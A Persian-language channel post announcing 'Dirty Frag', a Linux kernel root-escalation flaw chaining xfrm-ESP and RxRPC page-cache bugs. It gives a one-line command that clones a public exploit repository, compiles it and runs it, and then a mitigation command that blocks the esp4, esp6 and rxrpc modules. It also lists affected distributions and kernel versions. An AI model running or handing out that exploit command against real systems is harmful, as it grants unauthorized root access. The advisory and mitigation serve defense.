بازهم آسیب‌پذیری تمام لینوکس‌ها از ۲۰۱۷: Dirty Frag

آسیب‌پذیری تازه‌ای در ادامه‌ی Dirty Pipe و Copy Fail پیدا شده، که با ترکیب دو باگ امنیتی (xfrm-ESP و RxRPC در Page Cache) در بسیاری از توزیع‌ها می‌تونه دسترسی root بگیره.

می‌تونید روی سیستم خودتون هم امتحانش کنید:

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

پس از اینکه انجامش دادید، Page Cache شما آلوده شده با اجرای دستور:

echo 3 > /proc/sys/vm/drop_caches

یا ری‌استارت کردن سیستم به حالت پیش برگردونیدش.

راهکار:
تا پچ امنیتی برای توزیعتون بیاد می‌تونید با این دستور ماژولهایی که این آسیب‌پذیری در اونها وجود داره را غیرفعال کنید و Page cache را پاک کنید:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

روی این سیستم‌ها تا الان تست شده و آسیب‌پذیر بودند:

Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64

اگه شبیه CopyFail به نظر میاد خودشون گفتن که:

ایده شروع این تحقیق از آسیب‌پذیری Copy Fail گرفته شده. به‌طور مشخص، بخش xfrm-ESP در زنجیره آسیب‌پذیری Dirty Frag از همان نقطه ضعف مشابه Copy Fail استفاده می‌کند. اما تفاوت مهم این است که این آسیب‌پذیری مستقل از وجود ماژول algif_aead فعال می‌شود.

به عبارت دیگر، حتی اگر روی سیستم راهکار شناخته‌شده مقابله با Copy Fail (مثل غیرفعال کردن algif_aead) اعمال شده باشد، باز هم لینوکس شما در برابر Dirty Frag آسیب‌پذیر باقی می‌ماند.

⌨️ توضیحات بیشتر در گیت‌هاب

تمام این اتفاق‌ها داره در زمانی میوفته که اینترنت ایران همچنان قطعه، سیستم‌ها به روز نشدند، با خبر شدن از این باگ‌ها و برطرف کردنشون به مراتب سخت‌تر خواهد بود.

✈️ به این لیست (از کانال سهراب) Dirty Frag را هم اضافه کنید.


🎮 @gooyban